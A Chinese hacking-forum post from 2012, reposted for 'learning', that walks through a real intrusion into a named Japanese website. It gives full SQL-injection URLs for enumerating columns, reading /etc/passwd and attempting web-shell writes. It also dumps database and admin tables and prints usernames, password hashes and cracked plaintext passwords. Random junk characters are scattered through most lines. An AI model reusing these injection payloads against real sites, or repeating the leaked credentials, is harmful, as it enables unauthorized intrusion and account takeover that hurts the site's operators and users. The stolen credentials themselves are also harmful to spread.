找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3189|回复: 1
打印 上一主题 下一主题

原创 检测汉奸站全过程

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-17 16:22:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
补:www.zuaa.jp测试

8 r! _4 K) w' S6 M+ g; ~* l$ q
* h& \$ k$ S, `% E" Q% U6 p" p0x01. 检测 www.zuaa.jp 收集数据
- q3 F* _' b$ B/ }; m' ]5 ?: h
1 }0 J& H" U3 I% f4 |5 T6 P4 I' O! T4 d5 H5 p% j
whatweb# ]: B% Q- z( y6 _
) S/ B* L& Z* x3 Y  K( T) h2 r1 H
1 K# a. \. V! P- \
利用NMAP扫描
9 @: p1 R6 o* \5 K, o$ P' P' M2 }5 c% a8 G5 N! ]; ^% v; f
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持3 _2 a& z9 P  H9 m- Z+ P
0x02.找注入点, D( \1 c3 Q1 m* K
找注入点:http://www.zuaa.jp/php/newsdetail.php?topic_id=390* C5 D- Y! g  P4 H
* Y9 I* ?' E  Q! Q/ K5 n- P2 b& m

/ G. t( l. U+ O# l0x03.order by0 b2 w! _3 w  \5 {& `
             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1( t3 a& J( x0 M1 K3 V/ F2 B
0 @8 n' F& m  }1 ^) P* W
order by 28报错,order by 27正常
+ ~# y" Y# I1 I, o6 T; F
4 o1 o$ n% x& ^0x04.   union手动查询) l- K! r1 g% {" T
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 6 I1 v( w  N6 \4 s1 X; n/ z
添加到 27 时正常显示 . i# R# p0 S4 J: K/ E
0 @9 K! _: `; w3 c0 G# d
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持! V4 T0 a' L6 M& G

% _/ C1 y4 E$ s5 I8 I+ A3 j9 Q0 v4 g0x05. info:( U+ I- @% V+ A
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 % S, B9 r1 \6 E; Q* B6 l

) L5 U3 Q* r0 x: Q* y3 Uuser:            root@localhost
' |0 h0 n4 P( t( Jdatabase:    openpne
" J, M$ N9 P5 t. Eversion:      4.1.22
& T  Y4 i1 k6 W. Zos:             portbld-freebsd5.4  V2 y) W. Q$ ?. Y5 t0 s: r

( l1 R, B2 U) A0 r- Q( v0x06. root用户3 q" u. k1 l) |1 D
利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)0 T' Y6 Z4 k* P% [9 K: l, ~+ p" X$ p
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
( n% a0 B% u# |* W. U: K' Z3 _  o& ~
  x" {4 P% V7 f9 W, P# N6 G通过工具转换
5 n8 K+ S2 i$ A. h- n8 F& j7 T1 V! X' ]* e4 |; g
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
0 E3 V4 t3 J9 ]0 X: D3 N7 c: X; f* A) \
0x07. 利用 into outfile) M. o& Y* l3 r* n
全部都失败
- z* s4 E2 q7 ~, m* t$ zhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php
4 n9 g7 C# F) ], }6 i' L
) _3 C6 m- c% W- q/ J9 n; E* ghttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php
+ s' m: \4 w( W& B, W
$ s* {! w; s: S( r! Y页面显示“MDB2 Error:syntax error”* l- ?" O5 d' t, n

5 d3 U2 Z) @# D5 o3 f0x08. 利用 mysql 4.1
) X- B0 G$ c4 \& F猜常规表名,字段未果 工具 sqlmap
; \7 E- o' z" @1 B中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
+ }+ g. e/ J& P; s0 s6 o8 z' K. K- T7 P; |; d6 R
  D0 U1 G) Y& b: r
- ~% X) {% k& j% q7 B' ?
0x09. 查找后台
/ A1 D' K* y. B! N$ K1 N, g* @2 c利用 现有的各种 后台工具尝试都不行
$ j5 D# D5 H4 S5 H4 z/ x
1 O+ [' p  L. g, a6 p- M0x10.  MySL外联方法8 ~# D6 I9 \$ E! P( ]/ h
从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连 www.zuaa.jp 不行
+ W7 {3 T, H8 E7 c可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user* F  \6 i4 }$ i$ r
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user
6 N6 A3 Y3 R9 p4 U4 h, V* y- Z4 @; z8 Q
这个可以在 www.cmd5.com 解密
% h) ^( Q; S& w! Kroot:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009& n( x3 w8 A' ^7 m2 v
chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
' g& i0 T' b! B3 Q! Wopenpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
# B- k4 ^$ u5 _. K  G  ?zuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???1 C* U" D% t. n3 `; p5 s9 ^
工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知! W7 l6 D3 |6 `" i( ^- i

/ M9 m/ T& |9 f2 r
5 U4 x9 q' X3 B# n0 d: P+ }; n% J0x11. 网站突破
. P: M9 p! S' w( X7 G发现网站的源程序 openpne, google 下载 openpne 源码
8 }0 z! L- k5 t3 N  [  U' Z; X5 A
# p% M! z8 Z: O: p. u
# M1 d5 f( V" [( P' f+ @% U0x12. 默认信息利用
) [+ ?( y/ }8 thttp://sns.zuaa.jp/?m=admin&a=page_login
( j) L. ~( H) W
2 l+ v0 R; H, e表名 (c_admin_user) ,字段名(username,password)
2 \) T5 r' U' ^! q6 Phttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user
( t. s8 I; w7 y
" c7 C! {7 |2 J6 J& x- U解密+ S1 g6 x1 r4 X
zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009
8 F0 j+ n$ e4 Izuaajp:c0923ec5857796a393da99905008c176,          zju1897  N8 C' b! l5 W) t
; ?& M" w1 O$ e0 D
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持3 N7 w, G+ `! Y" U

3 p  b& k: F. X5 R% H$ f4 x/ {0x13. 登录后台. c2 s2 \2 C+ m$ q5 C
) @& _1 |" w# |
$ b; _2 q& g& |; q- [+ O

* H- `; M2 M3 c0x14. 小结4 V& H. B& h5 V4 o7 K( R
利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。1 O' D" v+ Q' Q! f7 q
感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点
& E# p* y6 C, ~------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain
- F, g2 t$ O: @/ ~中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
$ g7 J& \, D6 }1 Q/ r. V: t
5 @* C, v! q) l7 G最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!
0 v, c5 K( B4 H: s/ |; Z" }. D

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

沙发
发表于 2012-9-19 08:27:03 | 只看该作者
哪个牛人 费的这劲 入侵的
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表